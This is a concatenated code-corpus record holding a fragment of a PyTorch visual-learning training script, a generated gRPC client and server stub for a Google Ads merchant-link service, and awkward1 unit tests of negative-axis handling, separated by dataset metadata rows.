random.shuffle(z_val_shuffle[j, k, :])
# Evaluate on the validation set
z_val_shuffle_1D = np.unique(z_val_shuffle[:, :, session])
indices = torch.tensor(z_val_shuffle_1D, dtype = torch.long)
x_valid = torch.index_select(x_tensor_transfer, 0, indices)
y_valid = torch.index_select(y_tensor_transfer, 0, indices)
y_valid = y_valid.squeeze(1)
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Accuracy', ':6.2f')
progress = ProgressMeter(1, [batch_time, losses, top1], prefix = ("Transfer >>> Session: " + str(session) + " Epoch: [{}]").format(1))
# Switch to evaluating mode
model.eval()
with torch.no_grad():
end = time.time()
x_ref = x_tensor_ref.cuda(gpu)
x_valid = x_valid.cuda(gpu)
y_valid = y_valid.cuda(gpu)
# Compute output
output = model(x_valid, x_ref)
loss = criterion(output, y_valid)
# Measure accuracy and record loss
acc1 = accuracy(output, y_valid, topk = 1)
losses.update(loss.item(), x_valid.size(0))
top1.update(acc1[0], x_valid.size(0))
# Save the validation accuracy for plotting
all_simulation_transfer_accuracy[model_counter][simulation_counter, group_counter, session - start_session] = acc1[0].item()
# Measure elapsed time
batch_time.update(time.time() - end)
progress.display(1)
# Remember the best accuracy and save checkpoint
is_best = all_simulation_transfer_accuracy[model_counter][simulation_counter, group_counter, session - start_session] >= best_acc1
best_acc1 = max(all_simulation_transfer_accuracy[model_counter][simulation_counter, group_counter, session - start_session], best_acc1)
### Training with Permuted Labels
print('Training with Permuted Labels')
# Read the reference image
file_name_path_ref = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/reference_stimulus.TIFF')
# Define the main reference variable
x_val_ref = np.zeros((224, 224, 3), dtype = np.float32)
x_tensor_ref = []
# Load image
img = Image.open(file_name_path_ref[0]).convert('RGB')
# Resize image
width, height = img.size
new_width = width * 256 // min(img.size)
new_height = height * 256 // min(img.size)
img = img.resize((new_width, new_height), Image.BILINEAR)
# Center crop image
width, height = img.size
startx = width // 2 - (224 // 2)
starty = height // 2 - (224 // 2)
img = np.asarray(img).reshape(height, width, 3)
img = img[starty:starty + 224, startx:startx + 224]
assert img.shape[0] == 224 and img.shape[1] == 224, (img.shape, height, width)
# Save image
x_val_ref[:, :, :] = img[:, :, :]
# Convert image to tensor, then normalize and copy it
x_temp = torch.from_numpy(np.transpose(x_val_ref[:, :, :], (2, 0, 1)))
normalize = transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])
for i in range(len(SF_training) * len(Ori_training)):
x_tensor_ref.append(normalize(x_temp))
x_tensor_ref = torch.stack(x_tensor_ref)
print(x_tensor_ref.shape)
# Load the PyTorch model
if model_counter == 0:
model = DNNforVPL_1()
elif model_counter == 1:
model = DNNforVPL_2()
elif model_counter == 2:
model = DNNforVPL_3()
elif model_counter == 3:
model = DNNforVPL_4()
elif model_counter == 4:
model = DNNforVPL_5()
model_dict = model.state_dict()
# Filter out unnecessary keys
pretrained_dict_model = {k : v for k, v in pretrained_dict.items() if k in model_dict}
# Overwrite entries in the existing state dict
model_dict.update(pretrained_dict_model)
# Load the new state dict
model.load_state_dict(model_dict)
# Initialize by zero the weights of the fully-connected layer of the model
nn.init.zeros_(model.classifier[0].weight)
nn.init.zeros_(model.classifier[0].bias)
# Set all the parameters of the model to be trainable
for param in model.parameters():
param.requires_grad = True
# Send the model to GPU/CPU
model = model.to(device)
cudnn.benchmark = True
# Define the main learning parameters
lr = 0.00001
momentum = 0.9
weight_decay = 0.0001
# Define the loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda(gpu)
optimizer = torch.optim.SGD(model.parameters(), lr, momentum = momentum, weight_decay = weight_decay)
# Define the main training parameters
start_session = 0
sessions = 1
# Random permutation of labels
y_tensor_training_permuted = copy.deepcopy(y_tensor_training)
idx = torch.randperm(y_tensor_training_permuted.nelement())
y_tensor_training_permuted = y_tensor_training_permuted.view(-1)[idx].view(y_tensor_training_permuted.size())
for session in range(start_session, sessions):
# Adjust the learning rate
adjust_learning_rate(optimizer, session, lr)
# Train on the training set
epochs = 180
ID_counter = 0
for epoch in range(epochs):
z_val_shuffle_1D = np.unique(z_val_shuffle[:, :, epoch])
indices = torch.tensor(z_val_shuffle_1D, dtype = torch.long)
x_train = torch.index_select(x_tensor_training, 0, indices)
y_train = torch.index_select(y_tensor_training_permuted, 0, indices)
y_train = y_train.squeeze(1)
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Accuracy', ':6.2f')
progress = ProgressMeter(epochs, [batch_time, losses, top1], prefix = ("Training >>> Session: " + str(session) + " Epoch: [{}]").format(epoch))
# Switch to training mode
model.train()
with torch.set_grad_enabled(True):
end = time.time()
x_ref = x_tensor_ref.cuda(gpu)
x_train = x_train.cuda(gpu)
y_train = y_train.cuda(gpu)
# Compute output
output = model(x_train, x_ref)
loss = criterion(output, y_train)
# Measure accuracy and record loss
acc1 = accuracy(output, y_train, topk = 1)
losses.update(loss.item(), x_train.size(0))
top1.update(acc1[0], x_train.size(0))
# Compute gradient and perform SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Save the validation accuracy for plotting
all_simulation_training_accuracy_permuted[model_counter][simulation_counter, group_counter, epoch] = acc1[0].item()
# Measure elapsed time
batch_time.update(time.time() - end)
progress.display(epoch)
# Remember the best accuracy
is_best = all_simulation_training_accuracy_permuted[model_counter][simulation_counter, group_counter, epoch] >= best_acc1
best_acc1 = max(all_simulation_training_accuracy_permuted[model_counter][simulation_counter, group_counter, epoch], best_acc1)
if (epoch + 1) % 10 == 0:
ID_counter = ID_counter + 1
for i in range(num_sample_artiphysiology):
feature_sample_artiphysiology[i, :] = [SF_transfer[x_sample_artiphysiology_index[i, 0]], Ori_transfer[x_sample_artiphysiology_index[i, 1]], x_sample_artiphysiology_index[i, 2]]
index = torch.tensor(z_val_transfer[x_sample_artiphysiology_index[i, 0], x_sample_artiphysiology_index[i, 1], x_sample_artiphysiology_index[i, 2]], dtype = torch.long)
x_sample = torch.index_select(x_tensor_transfer, 0, index)
x_sample = x_sample.cuda(gpu)
if model_counter == 0:
unit_activity_layer_0 = model.features[0](x_sample)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
elif model_counter == 1:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
elif model_counter == 2:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
elif model_counter == 3:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
elif model_counter == 4:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
unit_activity_layer_9 = model.features[9](unit_activity_layer_8)
unit_activity_layer_10 = model.features[10](unit_activity_layer_9)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_5[i, :] = unit_activity_layer_10[0].detach().cpu().clone().numpy()
if model_counter == 0:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 1:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 2:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 3:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 3, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 4:
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 3, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 4, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_5.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
### Saving the main variables
# Persist every accumulated result container as a MATLAB .mat file for
# offline analysis; each file holds exactly one variable keyed by its own
# name so it can be loaded unambiguously from MATLAB or scipy.io.loadmat.
# NOTE(review): parent_folder and the all_simulation_* containers are
# defined earlier in the script (outside this excerpt) — confirm they are
# all populated before this point.
scipy.io.savemat(parent_folder + '/all_simulation_training_accuracy.mat', mdict = {'all_simulation_training_accuracy': all_simulation_training_accuracy})
scipy.io.savemat(parent_folder + '/all_simulation_transfer_accuracy.mat', mdict = {'all_simulation_transfer_accuracy': all_simulation_transfer_accuracy})
scipy.io.savemat(parent_folder + '/all_simulation_all_ID.mat', mdict = {'all_simulation_all_ID': all_simulation_all_ID})
scipy.io.savemat(parent_folder + '/all_x_sample_ID.mat', mdict = {'all_x_sample_ID': all_x_sample_ID})
scipy.io.savemat(parent_folder + '/all_simulation_training_accuracy_permuted.mat', mdict = {'all_simulation_training_accuracy_permuted': all_simulation_training_accuracy_permuted})
scipy.io.savemat(parent_folder + '/all_simulation_all_ID_permuted.mat', mdict = {'all_simulation_all_ID_permuted': all_simulation_all_ID_permuted})
| 69.666346
| 279
| 0.547389
| 7,736
| 72,453
| 4.780377
| 0.05817
| 0.106109
| 0.102052
| 0.059625
| 0.870907
| 0.852059
| 0.833915
| 0.820827
| 0.813472
| 0.803088
| 0
| 0.05278
| 0.363767
| 72,453
| 1,040
| 280
| 69.666346
| 0.749463
| 0.053096
| 0
| 0.716138
| 0
| 0
| 0.029342
| 0.009954
| 0
| 0
| 0
| 0
| 0.004323
| 1
| 0.01585
| false
| 0
| 0.028818
| 0
| 0.051873
| 0.020173
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02dca52a95780ec0bd2bc6ffea745aef50374d80
| 8,250
|
py
|
Python
|
google/ads/google_ads/v6/proto/services/merchant_center_link_service_pb2_grpc.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/merchant_center_link_service_pb2_grpc.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v6/proto/services/merchant_center_link_service_pb2_grpc.py
|
arammaliachi/google-ads-python
|
a4fe89567bd43eb784410523a6306b5d1dd9ee67
|
[
"Apache-2.0"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.ads.google_ads.v6.proto.resources import merchant_center_link_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_merchant__center__link__pb2
from google.ads.google_ads.v6.proto.services import merchant_center_link_service_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2
class MerchantCenterLinkServiceStub(object):
    """Proto file describing the MerchantCenterLink service.

    This service allows management of links between Google Ads and Google
    Merchant Center.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # One unary-unary callable per RPC, bound to the fully-qualified
        # gRPC method path with the generated protobuf serializer for the
        # request type and deserializer for the response type.
        self.ListMerchantCenterLinks = channel.unary_unary(
                '/google.ads.googleads.v6.services.MerchantCenterLinkService/ListMerchantCenterLinks',
                request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksRequest.SerializeToString,
                response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksResponse.FromString,
                )
        self.GetMerchantCenterLink = channel.unary_unary(
                '/google.ads.googleads.v6.services.MerchantCenterLinkService/GetMerchantCenterLink',
                request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.GetMerchantCenterLinkRequest.SerializeToString,
                # GetMerchantCenterLink returns the resource message itself,
                # so the deserializer comes from the resources pb2 module.
                response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_merchant__center__link__pb2.MerchantCenterLink.FromString,
                )
        self.MutateMerchantCenterLink = channel.unary_unary(
                '/google.ads.googleads.v6.services.MerchantCenterLinkService/MutateMerchantCenterLink',
                request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkRequest.SerializeToString,
                response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkResponse.FromString,
                )
class MerchantCenterLinkServiceServicer(object):
    """Proto file describing the MerchantCenterLink service.

    This service allows management of links between Google Ads and Google
    Merchant Center.
    """

    # Each handler below is the generated default: it reports UNIMPLEMENTED
    # to the client and raises locally. Subclasses override these methods
    # with real implementations.

    def ListMerchantCenterLinks(self, request, context):
        """Returns Merchant Center links available for this customer.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetMerchantCenterLink(self, request, context):
        """Returns the Merchant Center link in full detail.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def MutateMerchantCenterLink(self, request, context):
        """Updates status or removes a Merchant Center link.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_MerchantCenterLinkServiceServicer_to_server(servicer, server):
    # Register the servicer's three RPCs on the given grpc.Server. Each
    # entry maps the RPC name to a unary-unary handler that deserializes
    # the request and serializes the response with the generated pb2 code.
    rpc_method_handlers = {
            'ListMerchantCenterLinks': grpc.unary_unary_rpc_method_handler(
                    servicer.ListMerchantCenterLinks,
                    request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksRequest.FromString,
                    response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksResponse.SerializeToString,
            ),
            'GetMerchantCenterLink': grpc.unary_unary_rpc_method_handler(
                    servicer.GetMerchantCenterLink,
                    request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.GetMerchantCenterLinkRequest.FromString,
                    response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_merchant__center__link__pb2.MerchantCenterLink.SerializeToString,
            ),
            'MutateMerchantCenterLink': grpc.unary_unary_rpc_method_handler(
                    servicer.MutateMerchantCenterLink,
                    request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkRequest.FromString,
                    response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkResponse.SerializeToString,
            ),
    }
    # A generic handler dispatches incoming calls by service name.
    generic_handler = grpc.method_handlers_generic_handler(
            'google.ads.googleads.v6.services.MerchantCenterLinkService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class MerchantCenterLinkService(object):
    """Proto file describing the MerchantCenterLink service.

    This service allows management of links between Google Ads and Google
    Merchant Center.
    """

    # Each static method is a channel-less convenience wrapper over
    # grpc.experimental.unary_unary: it creates (or reuses) a channel to
    # `target` and performs a single call with the generated serializers.

    @staticmethod
    def ListMerchantCenterLinks(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.MerchantCenterLinkService/ListMerchantCenterLinks',
            google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksRequest.SerializeToString,
            google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.ListMerchantCenterLinksResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def GetMerchantCenterLink(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.MerchantCenterLinkService/GetMerchantCenterLink',
            google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.GetMerchantCenterLinkRequest.SerializeToString,
            google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_merchant__center__link__pb2.MerchantCenterLink.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def MutateMerchantCenterLink(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.MerchantCenterLinkService/MutateMerchantCenterLink',
            google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkRequest.SerializeToString,
            google_dot_ads_dot_googleads_dot_v6_dot_services_dot_merchant__center__link__service__pb2.MutateMerchantCenterLinkResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 55.369128
| 181
| 0.755152
| 827
| 8,250
| 7.001209
| 0.141475
| 0.067703
| 0.074611
| 0.051813
| 0.803282
| 0.798964
| 0.78981
| 0.736615
| 0.736615
| 0.700345
| 0
| 0.007628
| 0.189576
| 8,250
| 148
| 182
| 55.743243
| 0.858361
| 0.101939
| 0
| 0.466019
| 1
| 0
| 0.104067
| 0.08517
| 0
| 0
| 0
| 0
| 0
| 1
| 0.07767
| false
| 0
| 0.029126
| 0.029126
| 0.165049
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f31fc8934e8e851d56e4a1ed1b5752cba9c90bdf
| 4,001
|
py
|
Python
|
tests/test_0163_negative-axis-wrap.py
|
sjperkins/awkward-1.0
|
75dbd5d06a012ff9d1da56f898b747cea2b1d2a9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0163_negative-axis-wrap.py
|
sjperkins/awkward-1.0
|
75dbd5d06a012ff9d1da56f898b747cea2b1d2a9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0163_negative-axis-wrap.py
|
sjperkins/awkward-1.0
|
75dbd5d06a012ff9d1da56f898b747cea2b1d2a9
|
[
"BSD-3-Clause"
] | null | null | null |
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/master/LICENSE
import sys
import pytest
import numpy
import awkward1
def test_array_3d():
    """awkward1.num with positive and negative axes on a regular 3-d array."""
    data = numpy.arange(3 * 5 * 2).reshape(3, 5, 2)
    array = awkward1.Array(data)
    assert awkward1.to_list(array) == data.tolist()
    # Expected counts of the innermost lists: a 3x5 grid of 2s.
    twos = [[2, 2, 2, 2, 2], [2, 2, 2, 2, 2], [2, 2, 2, 2, 2]]
    assert awkward1.num(array, axis=0) == 3
    assert awkward1.to_list(awkward1.num(array, axis=1)) == [5, 5, 5]
    assert awkward1.to_list(awkward1.num(array, axis=2)) == twos
    # One past the depth is an error.
    with pytest.raises(ValueError) as err:
        awkward1.num(array, axis=3)
    assert str(err.value).startswith("'axis' out of range for 'num'")
    # Negative axes mirror the positive ones: -1 <-> 2, -2 <-> 1, -3 <-> 0.
    assert awkward1.to_list(awkward1.num(array, axis=-1)) == twos
    assert awkward1.to_list(awkward1.num(array, axis=-2)) == [5, 5, 5]
    assert awkward1.num(array, axis=-3) == 3
    # One past the depth on the negative side is an error too.
    with pytest.raises(ValueError) as err:
        awkward1.num(array, axis=-4)
    assert str(err.value).startswith("axis == -4 exceeds the depth == 3 of this array")
def test_list_array():
    """awkward1.num on the same 3x5x2 data built from nested Python lists.

    Mirrors test_array_3d, but the layout comes from .tolist() so the array
    is list-typed rather than a regular numpy-backed array.
    """
    array = awkward1.Array(numpy.arange(3 * 5 * 2).reshape(3, 5, 2).tolist())
    assert awkward1.num(array, axis=0) == 3
    # Compare via to_list so the assertion is exact Python equality instead
    # of an elementwise awkward comparison with ambiguous truthiness.
    assert awkward1.to_list(awkward1.num(array, axis=1)) == [5, 5, 5]
    assert awkward1.to_list(awkward1.num(array, axis=2)) == [[2, 2, 2, 2, 2],
                                                             [2, 2, 2, 2, 2],
                                                             [2, 2, 2, 2, 2]]
    with pytest.raises(ValueError) as err:
        awkward1.num(array, axis=3)
    assert str(err.value).startswith("'axis' out of range for 'num'")
    # BUG FIX: the axis=-1 and axis=-2 expectations were swapped. For a
    # depth-3 array, axis=-1 counts the innermost lists (the 2s) and
    # axis=-2 counts the middle lists (the 5s), exactly matching axis=2
    # and axis=1 above and the assertions in test_array_3d.
    assert awkward1.to_list(awkward1.num(array, axis=-1)) == [[2, 2, 2, 2, 2],
                                                              [2, 2, 2, 2, 2],
                                                              [2, 2, 2, 2, 2]]
    assert awkward1.to_list(awkward1.num(array, axis=-2)) == [5, 5, 5]
    assert awkward1.num(array, axis=-3) == 3
    with pytest.raises(ValueError) as err:
        awkward1.num(array, axis=-4)
    assert str(err.value).startswith("axis == -4 exceeds the depth == 3 of this array")
def test_record_array():
    """awkward1.num on an array of records whose fields have different depths."""
    records = [
        {"x": [1], "y": [[], [1]]},
        {"x": [1, 2], "y": [[], [1], [1, 2]]},
        {"x": [1, 2, 3], "y": [[], [1], [1, 2], [1, 2, 3]]},
    ]
    array = awkward1.Array(records)
    # axis=0 counts per field; axis=1 counts inside each record's fields.
    assert awkward1.num(array, axis=0).tolist() == {"x": 3, "y": 3}
    per_record_counts = [{"x": 1, "y": 2}, {"x": 2, "y": 3}, {"x": 3, "y": 4}]
    assert awkward1.num(array, axis=1).tolist() == per_record_counts
    # axis=2 exceeds the minimum depth (field "x" is only depth 2).
    with pytest.raises(ValueError) as err:
        awkward1.num(array, axis=2)
    assert str(err.value).startswith("'axis' out of range for 'num'")
    # axis=-1 counts at each field's own innermost depth.
    innermost_counts = [
        {"x": 1, "y": [0, 1]},
        {"x": 2, "y": [0, 1, 2]},
        {"x": 3, "y": [0, 1, 2, 3]},
    ]
    assert awkward1.num(array, axis=-1).tolist() == innermost_counts
def test_record_array_axis_out_of_range():
    """Negative axes beyond a record array's (min) depth raise ValueError."""
    array = awkward1.Array([
        {"x": [1], "y": [[], [1]]},
        {"x": [1, 2], "y": [[], [1], [1, 2]]},
        {"x": [1, 2, 3], "y": [[], [1], [1, 2], [1, 2, 3]]},
    ])
    # Each out-of-range negative axis must fail with its specific message.
    cases = (
        (-2, "axis == -2 exceeds the min depth == 2 of this array"),
        (-3, "axis == -3 exceeds the depth == 2 of this array"),
    )
    for axis, expected_prefix in cases:
        with pytest.raises(ValueError) as err:
            awkward1.num(array, axis=axis)
        assert str(err.value).startswith(expected_prefix)
| 46.523256
| 91
| 0.457886
| 543
| 4,001
| 3.342541
| 0.145488
| 0.065014
| 0.090909
| 0.112397
| 0.834711
| 0.804959
| 0.790083
| 0.789532
| 0.787879
| 0.712948
| 0
| 0.098727
| 0.351912
| 4,001
| 85
| 92
| 47.070588
| 0.601234
| 0.021745
| 0
| 0.521739
| 0
| 0
| 0.077965
| 0
| 0
| 0
| 0
| 0
| 0.434783
| 1
| 0.057971
| false
| 0
| 0.057971
| 0
| 0.115942
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b868749d2b9e831f210481eb5869909b0afdaf64
| 185,737
|
py
|
Python
|
backend/tracim_backend/tests/functional/test_user.py
|
lezardrouge/tracim
|
713ff6066767554333e7e0b1de608ec1a7e4229c
|
[
"MIT"
] | null | null | null |
backend/tracim_backend/tests/functional/test_user.py
|
lezardrouge/tracim
|
713ff6066767554333e7e0b1de608ec1a7e4229c
|
[
